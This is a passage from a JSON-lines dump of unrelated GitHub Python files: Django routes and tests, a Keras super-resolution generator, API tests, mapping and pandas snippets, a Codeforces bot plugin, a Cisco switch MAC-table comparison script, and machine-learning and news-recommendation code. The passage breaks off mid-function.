views.UserProfileView.as_view(), name='user_profile'),\n path('create_post/', views.PostCreateView.as_view(), name='post_create')\n]\n","repo_name":"shhamil/SocialNet","sub_path":"accaunt/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27575040177","text":"from keras import Input\nfrom keras.layers import BatchNormalization, Add, PReLU\nfrom keras.layers.convolutional import Conv2D, UpSampling2D\nfrom keras.models import Model\n\n\ndef ResidualBlock(layer_input, filters):\n x = Conv2D(filters=filters, kernel_size=3, strides=1, padding=\"same\")(layer_input)\n x = BatchNormalization(momentum=0.5)(x)\n x = PReLU()(x)\n x = Conv2D(filters, kernel_size=3, strides=1, padding=\"same\")(x)\n x = BatchNormalization(momentum=0.5)(x)\n x = Add()([layer_input, x])\n return x\n\n\ndef UpSample2D(layer_input):\n x = Conv2D(256, kernel_size=3, strides=1, padding=\"same\")(layer_input)\n x = UpSampling2D(size=2)(x)\n x = PReLU()(x)\n return x\n\n\ndef RB_Model(gt_size, scale, channels=3, generator_filters=64, num_blocks=16):\n size = int(gt_size / scale)\n\n net_input = Input(shape=[size, size, channels])\n\n conv1 = Conv2D(64, kernel_size=9, strides=1, padding=\"same\")(net_input)\n conv1 = PReLU()(conv1)\n\n residual_blocks = conv1\n for _ in range(num_blocks):\n residual_blocks = ResidualBlock(residual_blocks, generator_filters)\n\n # Post-residual block\n conv2 = Conv2D(64, kernel_size=3, strides=1, padding=\"same\")(residual_blocks)\n conv2 = BatchNormalization(momentum=0.5)(conv2)\n conv2 = Add()([conv1, conv2])\n\n # Upsampling\n up1 = UpSample2D(conv2)\n up2 = UpSample2D(up1)\n\n # Generate high resolution output\n output = Conv2D(\n channels, kernel_size=9, strides=1, padding=\"same\", activation=\"tanh\"\n )(up2)\n\n model = Model(inputs=net_input, outputs=output, name=\"Generator\")\n model.summary(line_length=80)\n\n return model\n","repo_name":"vitgusmao/SuperResolutionGANs","sub_path":"nets/srgan/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16483239440","text":"# -*- coding: utf-8 -*-\nfrom testframework.base import *\nimport types\n\n\nrules_response_headers = {'Connection': 'Keep-Alive', \n 'Cache-Control': 'public, s-maxage=86400', \n 'Content-Type': 'application/vnd.api+json; charset=utf-8'}\n\nrules = {\n \"type\": \"rules\",\n \"id\": \"7\",\n \"attributes\": {\n \"object\": \"App\\\\Models\\\\V1\\\\Magento\\\\Product\\\\Product\",\n \"args\": \"a:2:{s:11:\\\"category_id\\\";i:3;s:5:\\\"limit\\\";i:6;}\",\n \"created_at\": \"2017-09-26 17:23:32\",\n \"updated_at\": \"2017-09-26 17:23:32\"\n },\n \"links\": {\n \"self\": \"https://api-staging.sssports.com/v1/rules/7\"\n }}\n\nno_rules = 2\n\n\nclass TestFiles(BaseTest):\n\n\n def test001_get_rules(self):\n \"\"\" TestCase-23: Test case for test get /rules.*\n **Test Scenario:**\n #. Get /rules, should succeed\n #. Check response headers, should succeed\n #. Check response body, should succeed\n \"\"\" \t\n self.lg('%s STARTED' % self._testID)\n response = self.get_request_response(uri='/rules')\n \n self.lg('#. Get /rules, should succeed')\n self.assertEqual(response.status_code, 200)\n self.assertTrue(response.ok)\n \n self.lg('#. Check response headers, should succeed')\n [self.assertIn(header, response.headers.keys()) for header in rules_response_headers.keys()]\n [self.assertEqual(rules_response_headers[header], response.headers[header]) for header in rules_response_headers.keys()]\n \n self.lg('#. Check response body, should succeed')\n self.assertEqual(type(response.json()), types.DictType)\n\n self.assertIn('data', response.json().keys())\n self.assertEqual(type(response.json()['data']), types.ListType)\n self.assertEqual(len(response.json()['data']), no_rules)\n [self.assertEqual(type(file_dict), types.DictType) for file_dict in response.json()['data']]\n\n for category_dict in response.json()['data']:\n for key in category_dict.keys():\n self.assertIn(key, rules.keys())\n if file_dict['id'] == rules['id']:\n self.assertEqual(file_dict['type'], rules['type']) \n self.assertEqual(file_dict['links'], rules['links']) \n self.assertEqual(file_dict['attributes'], rules['attributes']) \n\n self.lg('%s ENDED' % self._testID) \n \n\n def test002_get_rule(self):\n \"\"\" TestCase-24: Test case for test get /rules/{id}.*\n **Test Scenario:**\n #. Get /rules/{id}, should succeed\n #. Check response headers, should succeed\n #. Check response body, should succeed\n \"\"\" \t\n self.lg('%s STARTED' % self._testID) \n response = self.get_request_response(uri='/rules/%s' % rules['id'])\n \n self.lg('#. Get /rules/{id}, should succeed')\n self.assertEqual(response.status_code, 200)\n self.assertTrue(response.ok) \n \n self.lg('#. Check response headers, should succeed')\n [self.assertIn(header, response.headers.keys()) for header in rules_response_headers.keys()]\n [self.assertIn(rules_response_headers[header], response.headers[header]) for header in rules_response_headers.keys()] \n \n self.lg('#. Check response body, should succeed')\n self.assertEqual(type(response.json()), types.DictType) \n \n self.assertIn('data', response.json().keys())\n self.assertEqual(type(response.json()['data']), types.DictType)\n self.assertEqual(response.json()['data']['id'], rules['id']) \n self.assertEqual(response.json()['data']['type'], rules['type']) \n self.assertEqual(response.json()['data']['links'], rules['links']) \n self.assertEqual(response.json()['data']['attributes'], rules['attributes']) \n\n self.lg('%s ENDED' % self._testID)","repo_name":"simplymahmoud/sss-scripts","sub_path":"mobile_api_testing/testsuite/test_014_rules.py","file_name":"test_014_rules.py","file_ext":"py","file_size_in_byte":3976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38122993019","text":"import pandas as pd\nimport folium\n\nclass FoliumTest:\n def __init__(self):\n self.context = './data'\n\n def hook(self):\n self.show_map()\n\n def show_map(self):\n state_geo = self.context + '/us-state.json'\n state_unemployment = self.context+'/us_unemployment.csv'\n state_data = pd.read_csv(state_unemployment)\n m = folium.Map(location=[37,-102], zoom_start=5)\n # 속성값 정의\n m.choropleth(\n geo_data = state_geo,\n name = 'choropleth',\n data = state_data,\n columns = ['State', 'Unemployment'],\n key_on = 'feature.id',\n fill_color = 'YlGn',\n fill_opacity = 0.7, #opacity 투명도\n line_opacity = 0.2,\n legend_name = 'Unemployment Rate (%)'\n )\n folium.LayerControl().add_to(m)\n m.save('./saved_data/USA.html') #flask에 html코딩을 해두지 않아서 여기에서 설정하는 것\n","repo_name":"smile2019kr/seoul_cctv","sub_path":"seoul_crime/folium_test.py","file_name":"folium_test.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14746174788","text":"import pandas as pd\n\ndef table():\n class_scores = [\n {'성적':'dic1', '국어': 'A','영어': 'A','수학':'C'},\n {'성적':'dic2','국어':'A','영어': 'B','수학':'C'}\n ]\n\n table = pd.DataFrame(class_scores,\n columns=['성적','국어', '영어', '수학'])\n print(table)\n\ntable()\n\n# 이렇게만 해도 나오긴 한데,,,, 함수를 만들어서 자동으로 table에 학점 값을 지정해주는 건 어케 할까\n\n# from homework2 import grade_scores2\n# 어쩔땐 from import가 그냥 회색으로 되버리는 데, 어쩔때 그런 걸까? 질문하기!\n\n# python homework2_dataframe.py","repo_name":"canary4651/TIL","sub_path":"Program/pycharm/homework2_dataframe.py","file_name":"homework2_dataframe.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"14948758597","text":"'''\nKnuth–Morris–Pratt algorithm\nauthor:Ammar\n'''\nimport re\nimport math\ndef Lps(pattern):\n lps=[0]\n patternList=[c for c in pattern]\n j=1 #pointer to iterate the main pattern list\n i=int() #pointer to iterate the suffix\n k=int() #pointer to iterate the prefix\n value=int() #value of the longest pattern prefix which is also a suffix\n \n while patternList and j0:\n j=lps[j-1]\n \n else:\n j=0 \n i+=1\n print('------i',i)\n print('exist',exist)\n print('j',j) \n \n if j==len(pattern):\n return i-j\n else:\n return -1\n \n \n \n \n \n\nhaystack='mississippi'\nneedle='issippi'\n \nprint(KMP( haystack, needle))\n#print(Lpc('AAABAAA'))","repo_name":"AmmarElsherif2021/DataStructres_Algorithms","sub_path":"needle-haysack.py","file_name":"needle-haysack.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5798478741","text":"import sys\nimport httpx\n\nfrom nonebot import on_command, logger\nfrom nonebot.rule import to_me\nfrom nonebot.adapters import Bot, Event\nfrom nonebot.adapters.cqhttp import MessageSegment\nfrom nonebot.typing import T_State\nfrom src.plugins.time import timestamp_convert\n\n__plugin_name__ = 'codeforces_user_info'\n__plugin_usage__ = '拉取codeforces的相关数据'\n\n\nasync def get_request(url):\n try:\n request = httpx.get(url, timeout=3)\n get = request.json()\n\n if request.status_code == httpx.codes.OK and get['status'] == 'OK' and len(get['result']):\n logger.debug(get['result'])\n return True, get['result'][0]\n else:\n return False, request.status_code\n except httpx.HTTPError as e:\n logger.error(e, file=sys.stderr)\n return False, e\n\n\nsession = on_command(\"info\", rule=to_me(), priority=5)\n\n\n@session.handle()\nasync def get_user_info(bot: Bot, event: Event, state: T_State):\n user_url = \"https://codeforces.com/api/user.info?handles=\"\n user_name = str(event.get_message()).strip()\n print('user_name=%s' % user_name)\n if user_name == \"\":\n await session.reject(\"查询名称���能为空, 请重新输入要查找的用户名\")\n return\n\n status, info = await get_request(user_url + user_name)\n if status:\n sent_message = \"\"\"Name: {name}\nLast visit: {time}\nRank: {rank}\nRating: {rating}\nMax rating: {maxRating}\"\"\" \\\n .format(name=info.get('handle', 'anonymous'),\n time=await timestamp_convert(info.get('lastOnlineTimeSeconds', 'very long')),\n rank=info.get('rank', 'unknown'), rating=info.get('rating', 'unknown'),\n maxRating=info.get('maxRating', 'unknown'))\n title_img_url = info.get('titlePhoto')\n await session.send(MessageSegment.image(title_img_url, timeout=3))\n else:\n if info == 200 or 400:\n sent_message = \"用户: %s不存在\" % user_name\n pass\n else:\n sent_message = \"http code=%d\" % info\n\n await session.finish(sent_message)\n","repo_name":"FrankOu2001/codeforces_robot","sub_path":"src/plugins/codeforces_user_info/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32234397317","text":"from netmiko import ConnectHandler\nfrom pprint import pprint\nimport textfsm\nimport glob\nimport os\nfrom tabulate import tabulate\n\n# this script reads multiple txt files with the output of show mac address-table\n# txt file should only include the command output - remove \"hostname# show mac table\"\n# txt file filename should be the hostname of the switch - To be used in this script as the hostname\n\n# script will compile all the mac table txt files and compare with the new mac table which is taken\n# by sshing into the new switch and run the show mac address-table command\n# both tables wil be compared and the script will find if the mac exists on new switch and if vlan is same\n#\n#--------------------- Example Output ------------------------------#\n\n# New Port Old Port + Switch VLAN MAC Address\n# ---------- ------------------- ------------------ --------------\n# Gi0/2 Gi0/2 esw01 Wrong VLAN- Old: 3 2200.0001.0002\n# NOT FOUND Gi0/1 esw01 1 8888.0011.1111\n# Gi0/1 Gi0/2 esw02 1 5000.0011.1111\n# Gi1/0 Gi0/1 esw02 1 5000.0022.2222\n# NOT FOUND Gi0/2 esw03 1 3333.3333.3333\n# NOT FOUND Gi0/1 esw03 1 3232.3232.3232\n\n#--------------------------------------------------------------------#\n\n#---------------CHANGE THESE-----------------------------------------#\nmySwitch = {\n 'device_type': 'cisco_ios',\n 'host': '192.168.30.133',\n 'username': 'cisco',\n 'password': 'cisco',\n 'secret': 'cisco', # optional, defaults to ''\n}\n\ntemplatePath = r\"C:\\Program Files\\ntc-templates-master\\ntc_templates\\templates\"\n\n#----------------------- END ----------------------------------------#\n\n\ndef convertTxtfsmOp(header, result):\n '''convert textfsm output to netmiko textfsm output(JSON)'''\n output = []\n for n in range(len(result)):\n res = {header[i].lower(): result[n][i] for i in range(len(header))}\n output.append(res)\n\n return output\n\n\nif __name__ == \"__main__\":\n\n cmd = [\"show mac address-table dynamic\"]\n\n with ConnectHandler(**mySwitch) as con:\n con.disable_paging() # term len 0\n con.enable() # enable\n #prompt = con.find_prompt() #get the prompt eg. ESW01#\n\n # Dict with the key as command entered, value as output\n # eg. to access show int status output -> cmdOutput['show int status']\n cmdOutput = {}\n for c in cmd:\n # print(c)\n op = con.send_command(c, use_textfsm=True)\n cmdOutput[c] = op\n\n newShMacTableOp = cmdOutput['show mac address-table dynamic']\n ###exampe value###\n # [{'destination_address': '2200.0001.0002',\n # 'destination_port': 'Gi0/2',\n # 'type': 'DYNAMIC',\n # 'vlan': '1'},\n # {'destination_address': '5000.0011.1111',\n # 'destination_port': 'Gi0/1',\n # 'type': 'DYNAMIC',\n # 'vlan': '1'}]\n\n # pprint(shMacTableOp)\n\n combinedOldMacTable = []\n\n for filename in glob.glob('*.txt'):\n\n with open(rf\"{templatePath}\\cisco_ios_show_mac-address-table.textfsm\") as template, open(os.path.join(os.getcwd(), filename), 'r') as output:\n table = textfsm.TextFSM(template)\n header = table.header\n result = table.ParseText(output.read())\n for row in result:\n row[3] = row[3] + f\" {filename.split('.')[0]}\"\n\n oldShMacTableOp = convertTxtfsmOp(header, result)\n\n # pprint(oldShMacTableOp)\n for v in oldShMacTableOp:\n combinedOldMacTable.append(v)\n\n # ----compare and print the 2 mac tables----\n # NOT TESTED FOR TRUNK PORTS WITH MULTIPLE VLANS YET\n # once stable, can consider just printing error only\n\n # header for print output\n compareHdr = [\"New Port\", \"Old Port + Switch\", \"VLAN\", \"MAC Address\"]\n finalResult = []\n for entry in combinedOldMacTable:\n tmp = []\n oldPort = entry['destination_port']\n vlan = entry['vlan']\n mac = entry['destination_address']\n\n for nEntry in newShMacTableOp:\n # if mac is the same\n if nEntry['destination_address'] == mac:\n newPort = nEntry['destination_port']\n # if same vlan\n if vlan == nEntry['vlan']:\n vlanOp = vlan\n else:\n vlanOp = f\"Wrong VLAN- Old: {vlan}\"\n\n tmp = [newPort, oldPort, vlanOp, mac]\n # if tmp list is empty, means old mac address does not appear in new switch mac table\n if not tmp:\n tmp = [\"NOT FOUND\", oldPort, vlan, mac]\n\n finalResult.append(tmp)\n\n print(tabulate(finalResult, headers=compareHdr))\n","repo_name":"neozh3/Cisco-Automation","sub_path":"Switch Migration Scripts/Post Migration/compareMacTable.py","file_name":"compareMacTable.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26368077526","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 25 15:39:51 2022\n\n@author: jack\n\"\"\"\n\n\n\n# 1\nname = 'leo'\nn=37\ns = '{} has {} message.'.format(name,n)\nprint(s)\n\n# 2\nname = 'leo'\nn=37\ns = '{name} has {n} message.' \nprint(s.format_map(vars()))\n\n\nname = 'jack'\nn = 43\nprint(s.format_map(vars()))\n\n\n\n\n\n# 过滤列表方法\n\"\"\"\n定义:\nitertools.compress()\n输入:\niterable对象\n相应的Boolean选择器序列\n输出:\niterable对象中对应选择器为True的元素\n用途:\n当需要用另外一个相关联的序列来过滤某个序列的时候,这个函数非常有用\neg:\n两个列表如下,其元素相对应,现请根据count输出address,条件只输出count大于5的对应地址:\n\"\"\"\nfrom itertools import compress\n\naddres = [\n '123 N apple',\n '234 N yahoo',\n '457 E google',\n '212 N ibm',\n '987 N hp',\n '653 W aliyun',\n '487 N sina',\n '109 W baidu',\n ]\n\ncounts = [0,3,10,4,1,7,6,1]\n\nmore5 = [n>5 for n in counts]\n\n\na = list(compress(addres,more5))\nprint(f\"a = {a}\")\n\n#====================================================================\nimport numpy as np\na = np.array([[1, 2], [3, 4], [5, 6]])\nprint(f\"np.compress([0, 1], a, axis=0) = {np.compress([0, 1], a, axis=0)}\")\n\nprint(f\"np.compress([False, True, True], a, axis=0) = {np.compress([False, True, True], a, axis=0)}\")\n\nprint(f\"np.compress([False, True], a, axis=1) = {np.compress([False, True], a, axis=1)}\")\n\n\nprint(f\"np.compress([False, True], a) = {np.compress([False, True], a)}\")\n\n#====================================================================\nimport itertools \nimport operator\nCodes =['C', 'C++', 'Java', 'Python'] \nselectors = [False, False, False, True] \n \nBest_Programming = itertools.compress(Codes, selectors) \n \nfor each in Best_Programming:\n print(each)\n\n\n\n#====================================================================\nimport itertools \nimport operator \n \n \nexample = itertools.compress('ABCDE', [1, 0, 1, 0, 0]) \n \nfor each in example:\n print(each)\n\n\n\n# 复杂列表分类-group法\nrows = [\n {'city':'nanjing','date':'07/01/2012'},\n {'city':'beijing','date':'07/04/2012'},\n {'city':'shanghai','date':'07/02/2012'},\n {'city':'suzhou','date':'07/03/2012'},\n {'city':'guangzhou','date':'07/02/2012'},\n {'city':'tianjin','date':'07/02/2012'},\n {'city':'chengdu','date':'07/01/2012'},\n {'city':'wuxi','date':'07/04/2012'},\n ]\n\nfrom itertools import groupby\n\n\n\nrows.sort(key=lambda r: r['date'])\n\nfor date, items in groupby(rows, key=lambda r: r['date']):\n print(date)\n for i in items:\n print(\" \",i)\n\n\n\n\n\n","repo_name":"junjiecjj/Python","sub_path":"库示例/生成器迭代器/itertools.py","file_name":"itertools.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7883696867","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom .models import Post\n\nclass BlogTests(TestCase): # class for the blog test\n \n def setUp(self): # creating the user and database to test our model\n self.user = get_user_model().objects.create_user(\n username = 'testuser',\n email = 'test@email.com',\n password = 'secret'\n )\n\n self.post = Post.objects.create(\n title = 'A good title',\n body = 'Nice body content',\n author = self.user,\n )\n \n # testing string representation of the database\n def test_string_representation(self):\n post = Post(title = 'A sample title')\n self.assertEqual(str(post), post.title)\n \n # testing the post\n def test_post_content(self):\n self.assertEqual(f'{self.post.title}','A good title')\n self.assertEqual(f'{self.post.author}', 'testuser')\n self.assertEqual(f'{self.post.body}', 'Nice body content')\n \n # Confirming that our homePage returns 200 HTTP status code,\n # contains our body text, and uses the correct home.html template.\n def test_post_list_view(self):\n response = self.client.get(reverse('home'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Nice body content')\n self.assertTemplateUsed(response, 'home.html')\n \n # testing our detail page and the related urls\n def test_post_detail_view(self):\n response = self.client.get('/post/1/')\n no_response = self.client.get('/post/100000/')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(no_response.status_code, 404)\n self.assertContains(response, 'A good title')\n self.assertTemplateUsed(response, 'post_detail.html')\n \n def test_post_create_view(self):\n response = self.client.post(reverse('post_new'),{\n 'title': 'New title',\n 'body': 'New text',\n 'author': self.user,\n })\n self.assertEquals(response.status_code, 200)\n self.assertContains(response, 'New title')\n self.assertContains(response, 'New text')\n \n def test_post_update_view(self):\n response = self.client.post(reverse('post_edit', args = '1'),{\n 'title': 'Updated title',\n 'body': 'Updated text',\n })\n self.assertEqual(response.status_code, 302)\n \n def test_post_delete_view(self):\n response = self.client.post(reverse('post_delete', args = '1'))\n self.assertEqual(response.status_code, 302)\n ","repo_name":"pkrlfamous/blog-app","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17159648166","text":"import numpy as np\nimport pandas as pd\n\n\ndef read_known_genes(genome, relative_positions=True):\n \"\"\"Reads annotation files derived from UCSC\n :param genome: Genome version (such as hg19, hg38)\n :param relative_positions: Whether exon positions are relative to TSS or chromosomal positions\n :return: dataframe of transcripts\n \"\"\"\n column_names = ['name', 'chrom', 'strand', 'txStart', 'txEnd', 'cdsStart', 'cdsEnd', 'exonCount', 'exonStarts',\n 'exonEnds']\n _transcripts = pd.read_csv('data/knownGene.%s.txt.gz' % genome, sep='\\t', compression='gzip',\n names=column_names, header=None, usecols=list(range(len(column_names))))\n\n kg_xref = pd.read_csv('data/kgXreg.%s.txt.gz' % genome, sep='\\t', compression='gzip',\n names=['name', 'geneSymbol', 'description'], header=None, usecols=[0, 4, 7])\n _transcripts = pd.merge(_transcripts, kg_xref, on='name', how='left')\n\n _transcripts.exonStarts = _transcripts.exonStarts.apply(lambda x: np.array(x.rstrip(',').split(','), dtype=int))\n _transcripts.exonEnds = _transcripts.exonEnds.apply(lambda x: np.array(x.rstrip(',').split(','), dtype=int))\n\n # relative to TSS\n if relative_positions:\n _transcripts.exonStarts = _transcripts.exonStarts - _transcripts.txStart\n _transcripts.exonEnds = _transcripts.exonEnds - _transcripts.txStart\n\n _transcripts.cdsStart -= _transcripts.txStart\n _transcripts.cdsEnd -= _transcripts.txStart\n\n return _transcripts\n","repo_name":"eranroz/polyA","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33496639557","text":"#!/usr/bin/env python\n\n\n\"\"\"\nProblem Definition :\n\nThis script creates instances of all the classifiers and trains/tests them. It then provides an interface to the\nrecommendation system, where user can select a document from 'n' choices, and system recommends 'm' similar documents,\nwhere 'n' and 'm' are user selected.\n\n\"\"\"\n\n__author__ = 'vivek'\n\nimport time\nimport os\nfrom nb import NaiveBayes\nfrom rank_classifier import RankClassifier\nfrom knn import KNN\nimport random\nfrom document import Document\nfrom tfidf import Index\nfrom kmeans import KMeans\nfrom util import *\nfrom collections import defaultdict, Counter\n\n\ndef recommendation(all_docs, test_docs, classifier_list):\n\n print(\"Recommendation System\")\n print(\"---------------------\")\n\n # ask user for the desired option count and recommendation count. set default value in case invalid inputs.\n try:\n option_count = int(raw_input(\"\\nEnter number of articles to choose from. [number from 5 to 10 suggested]: \"))\n if option_count < 1 or option_count > 20:\n print(\"Invalid Choice.. By default selected 5.\")\n option_count = 5\n except:\n print(\"Invalid Choice.. By default selected 5.\")\n option_count = 5\n\n try:\n k_n = int(raw_input(\"\\nEnter number of recommendation per article. [number from 5 to 10 suggested]: \"))\n if k_n < 1 or k_n > 20:\n print(\"Invalid Choice.. By default selected 5.\")\n k_n = 5\n except:\n print(\"Invalid Choice.. By default selected 5.\")\n k_n = 5\n\n end = False\n\n # run the loop until user quits.\n while not end:\n\n # pick random documents from test docs and provide titles to the user.\n user_docs = random.sample(test_docs, option_count)\n\n while True:\n print(\"\\n---Available Choices For Articles(Titles)---\\n\")\n\n for i in range(len(user_docs)):\n print(str(i+1) + \": \" + user_docs[i].title)\n\n print(\"r: Refresh List\")\n print(\"q: Quit()\\n\")\n\n choice = raw_input(\"Enter Choice: \")\n\n if choice == 'q':\n end = True\n break\n elif choice == 'r':\n break\n else:\n try:\n user_choice = int(choice) - 1\n if user_choice < 0 or user_choice >= len(user_docs):\n print(\"Invalid Choice.. Try Again..\")\n continue\n except:\n print(\"Invalid Choice.. Try Again..\")\n continue\n selected_doc = user_docs[user_choice]\n\n # classifiers are sorted according to their f_measure in decreasing order. It helps when all\n # three classifiers differ in their predictions.\n classifier_list = sorted(classifier_list, key=lambda cl: cl.stats['f_measure'], reverse=True)\n\n prediction_list = list()\n for classifier in classifier_list:\n prediction_list.append(classifier.classify([selected_doc])[0])\n\n prediction_count = Counter(prediction_list)\n top_prediction = prediction_count.most_common(1)\n\n if top_prediction[0][1] > 1:\n prediction = top_prediction[0][0]\n else:\n prediction = prediction_list[0]\n\n # create knn instance using documents of predicted topic. and find k closest documents.\n knn = KNN(all_docs[prediction])\n k_neighbours = knn.find_k_neighbours(selected_doc, k_n)\n\n while True:\n print(\"\\nRecommended Articles for : \" + selected_doc.title)\n for i in range(len(k_neighbours)):\n print(str(i+1) + \": \" + k_neighbours[i].title)\n next_choice = raw_input(\"\\nEnter Next Choice: [Article num to read the article. \"\n \"'o' to read the original article. \"\n \"'b' to go back to article choice list.] \")\n\n if next_choice == 'b':\n break\n elif next_choice == 'o':\n text = selected_doc.text\n print(\"\\nArticle Text for original title : \" + selected_doc.title)\n print(text)\n else:\n try:\n n_choice = int(next_choice) - 1\n if n_choice < 0 or n_choice >= k_n:\n print(\"Invalid Choice.. Try Again..\")\n continue\n except:\n print(\"Invalid Choice.. Try Again..\")\n continue\n text = k_neighbours[n_choice].text\n print(\"\\nArticle Text for recommended title : \" + k_neighbours[n_choice].title)\n print(text)\n\n\ndef main():\n\n start_time = time.time()\n\n # Read documents, divide according to the topics and separate train and test data-set.\n\n t_path = \"../dataset/bbc/\"\n\n all_docs = defaultdict(lambda: list())\n\n topic_list = list()\n\n print(\"Reading all the documents...\\n\")\n\n for topic in os.listdir(t_path):\n d_path = t_path + topic + '/'\n topic_list.append(topic)\n temp_docs = list()\n\n for f in os.listdir(d_path):\n f_path = d_path + f\n temp_docs.append(Document(f_path, topic))\n\n all_docs[topic] = temp_docs[:]\n\n fold_count = 10\n\n train_docs, test_docs = list(), list()\n\n for key, value in all_docs.items():\n random.shuffle(value)\n test_len = int(len(value)/fold_count)\n train_docs += value[:-test_len]\n test_docs += value[-test_len:]\n\n # Create tfidf and tfidfie index of training docs, and store into the docs.\n index = Index(train_docs)\n\n print(\"Train Document Count: \" + str(len(train_docs)))\n print(\"Test Document Count: \" + str(len(test_docs)))\n\n test_topics = [d.topic for d in test_docs]\n\n for doc in train_docs:\n doc.vector = doc.tfidfie\n\n for doc in test_docs:\n doc.vector = doc.tf\n\n # create classifier instances.\n nb = NaiveBayes()\n rc = RankClassifier()\n kmeans = KMeans(topic_list)\n \n classifier_list = [rc, nb, kmeans]\n\n for i in range(len(classifier_list)):\n\n print(\"\\nClassifier #\" + str(i+1) + \"\\n\")\n\n classifier = classifier_list[i]\n\n classifier.confusion_matrix, c_dict = init_confusion_matrix(topic_list)\n\n print(\"Training...\\n\")\n\n classifier.train(train_docs)\n\n print(\"Testing... Classifying the test docs...\\n\")\n\n predictions = classifier.classify(test_docs)\n\n # Update the confusion matrix and statistics with updated values.\n classifier.confusion_matrix = update_confusion_matrix(test_topics, predictions, classifier.confusion_matrix,\n c_dict)\n\n classifier.stats = cal_stats(classifier.confusion_matrix)\n\n print(\"Confusion Matrix\\n\")\n for item in classifier.confusion_matrix:\n print(item)\n\n print(\"\\nStatistics\\n\")\n print_table(get_stats_table(classifier.stats))\n\n print(\"Run time...{} secs \\n\".format(round(time.time() - start_time, 4)))\n\n # call recommendation system once classifiers are ready.\n recommendation(all_docs, test_docs, classifier_list)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vivekpabani/News-Recommendation-System","sub_path":"source_code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"24344896313","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.distributions import OneHotCategorical, kl_divergence\nimport numpy as np\n\n# from torch.distributions import RelaxedOneHotCategorical\nfrom .pytorch_mods.relaxed_categorical import (\n ExpRelaxedCategorical,\n RelaxedOneHotCategorical,\n)\nfrom src.models.simple_module import one_hot_argmax, PackedSequneceUtil\nfrom src import device, cuda_device\nfrom allennlp.nn.util import move_to_device\n\n\nclass AnnealingTemperature(object):\n \"\"\"\n tau is updated every N step\n tau = max(base_tau, init_tau * exp (anneal_rate * step))\n \"\"\"\n\n def __init__(self, init_tau=1.0, base_tau=0.5, anneal_rate=1e-3, N=500):\n\n self.init_tau = init_tau\n self.base_tau = base_tau\n self.anneal_rate = anneal_rate\n self.N = N\n\n self._tau = init_tau\n self._step = 0\n\n def step(self):\n self._step += 1\n if self._step % self.N == 0:\n self._tau = np.maximum(\n self.init_tau * np.exp(-self.anneal_rate * self._step), self.base_tau\n )\n log.info(\n (\"\\nstep: {:d}, update tau: {:.4f}\\n\").format(self._step, self._tau)\n )\n\n return self._tau\n\n\n# TODO: if train tau_p: min value > 0, init\nclass KLConcrete(nn.Module):\n \"\"\"\n calculate kl (q||p)\n - posterior q (z|x)\n - prior p (z)\n\n careful that tau_p should be positive\n \"\"\"\n\n def __init__(\n self,\n K, # number of classes\n M, # number of splits\n kl_type=\"categorical\", # 'categorical', 'relaxed'\n logits_p=\"train\", # 'train', 'uniform'\n tau_p=1.0, # 'train', positive float value\n ):\n super().__init__()\n\n l = torch.ones(M, K)\n # torch.nn.init.orthogonal_(l)\n if logits_p == \"uniform\":\n self.logits_p = move_to_device(l, cuda_device)\n elif logits_p == \"train\":\n self.logits_p = nn.Parameter(l)\n\n self.kl_type = kl_type\n t = torch.FloatTensor(M, 1)\n if kl_type == \"relaxed\":\n if tau_p == \"train\":\n # torch.nn.init.uniform_(t, a=0.1, b=10)\n t.fill_(1.0) # init with 1\n self.tau_p = nn.Parameter(t)\n else:\n assert type(tau_p) in [int, float] and tau_p > 0\n self.tau_p = t.fill_(tau_p)\n self.tau_p = move_to_device(self.tau_p, cuda_device)\n\n def forward(self, q, z, logits_q):\n \"\"\"\n q: relaxed catergorical posterior\n z: bsz × M × K, sample from q\n logits_q: bsz × M × K\n \"\"\"\n if self.kl_type == \"categorical\":\n kl = self.kl_categorical(logits_q)\n elif self.kl_type == \"relaxed\":\n kl = self.kl_relaxed(q, z)\n return kl\n\n def kl_relaxed(self, q, z):\n \"\"\"\n Monte Carlo KL with relaxed prior\n\n it is important to have not too small temperature for q, otherwise log_prob produces nan\n 0.01 is very dangerous, 0.1 sometimes nan, 0.3 generally safe\n small temperature is dangerous for q but fine for p\n \"\"\"\n\n self.tau_p.data.clamp_(min=1e-2, max=10.0)\n p = RelaxedOneHotCategorical(\n logits=self.logits_p.expand_as(z), 